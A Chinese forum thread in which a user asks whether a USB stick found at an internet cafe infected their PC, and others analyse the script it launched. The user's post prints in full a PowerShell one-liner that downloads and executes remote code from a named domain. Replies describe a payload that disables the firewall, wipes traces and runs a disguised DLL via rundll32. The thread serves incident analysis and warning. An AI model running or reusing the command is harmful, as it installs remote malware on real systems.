网吧捡到一块u盘，发现一些神奇的事，怎么判断是否中招！

dongwang22

我尽量以最短的话，简要说明！！！






网吧捡到U盘后回家插入的自己的电脑，插入后会自动运行win+R,也就是运行窗口


powershell "$u='kt.oky.ink';try{iex(irm $u)}catch{iex(curl.exe -sL $u|Out-String)}




之后会输入这一条指令执行Powershell,运行很快,一秒左右运行成功，不知道是否运行成功，然后我就去查了相关的信息，发现kt.oky.ink域名会下载一个log.txt的文件，里面是一些执行代码，虽然有注释，但自己无法判断是否中招，以下是查到的IP


log.txt的部分代码：





有没有佬帮忙分析一下是否要重装系统，主要是盘里有一些资源不太想移动，但又怕椎已经中招了被远程，咋办！！！！

夏时

⚠️ 安全风险分析​​
​​该脚本具有典型的恶意软件行为​​：
获取管理员权限
关闭防火墙
清除系统日志和痕迹
下载并执行远程代码
自删除以隐藏行踪
​​vip.123yx.com是一个可疑域名​​，可能托管恶意文件。
​​rundll32.exe被滥用​​，可能用于 ​​DLL 注入​​ 或 ​​持久化攻击​​。
​​.TTF文件实际上是恶意 DLL​​，可能用于 ​​后门植入​​ 或 ​​勒索软件攻击​​。

憨憨问号

之前b站有人解析过，可以去搜搜

zzh233

以身试法 先生大义

dongwang22

汉族 发表于 2025-8-3 11:58
这种的不就是前段时间 出现的一个 U盘结合键盘的芯片完成的功能么？360有拦截这个功能了 ...

你是知道的，易语言玩家不装360...

汉族

这种的不就是前段时间 出现的一个 U盘结合键盘的芯片完成的功能么？360有拦截这个功能了

daye11334

感谢分享，很给力！~

tvvvhg

感谢佬，等会回去瞅瞅看看这个目录有没有TTF文件！

dongwang22

清华大学优等生 发表于 2025-8-3 09:25
下载了下log看了下 终止 rundll32 进程   部分杀毒软件依赖  rundll32   然后下载一个没有扩展名的文件 完 ...

感谢佬，等会回去瞅瞅看看这个目录有没有TTF文件！

805400753

PowerShell脚本分析
根据您提供的log.txt文件内容，这是一个PowerShell脚本，主要功能是执行系统管理操作和下载运行外部程序。以下是详细分析：

主要功能模块
1.管理员权限检查

检查当前是否以管理员身份运行
如果不是，则尝试以管理员身份重新启动脚本
包含两种重启方式：直接执行命令或执行脚本文件
2.系统服务操作

停止名为"MessageTransfer"的服务
等待2秒确保服务停止
3.注册表清理

清理HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer下的多个子项
包括RunMRU、RecentDocs、FeatureUsage、TypedPaths、ComDlg32等
4.系统设置修改

设置PowerShell执行策略为Bypass
关闭所有防火墙配置(Public、Private、Domain)
5.进程终止

11次强制终止rundll32进程
6.文件下载与处理

从指定URL下载Base64编码内容
如果Invoke-RestMethod失败则尝试使用curl.exe
对下载内容进行字节模式匹配和替换
将处理后的内容保存为临时TTF文件
7.文件执行

使用rundll32.exe执行下载的TTF文件
执行后退出脚本
安全风险提示
1.权限提升

脚本会自动尝试获取管理员权限，可能绕过用户确认
2.系统安全设置修改

关闭防火墙会大幅降低系统安全性
修改执行策略可能允许恶意脚本运行
3.可疑下载行为

从外部URL下载并执行未知内容
对下载内容进行字节级修改，可能是规避检测的手段
4.持久性威胁

脚本执行后会自删除，增加取证难度
建议
1.除非完全信任来源，否则不建议运行此类脚本
2.运行前应仔细检查所有URL和操作内容
3.在隔离环境中测试后再考虑在生产环境使用
4.注意此类脚本可能被用于恶意目的

下载了个740 KB的加密文件，不知道是什么

素颜2

忙分析一下是否要重装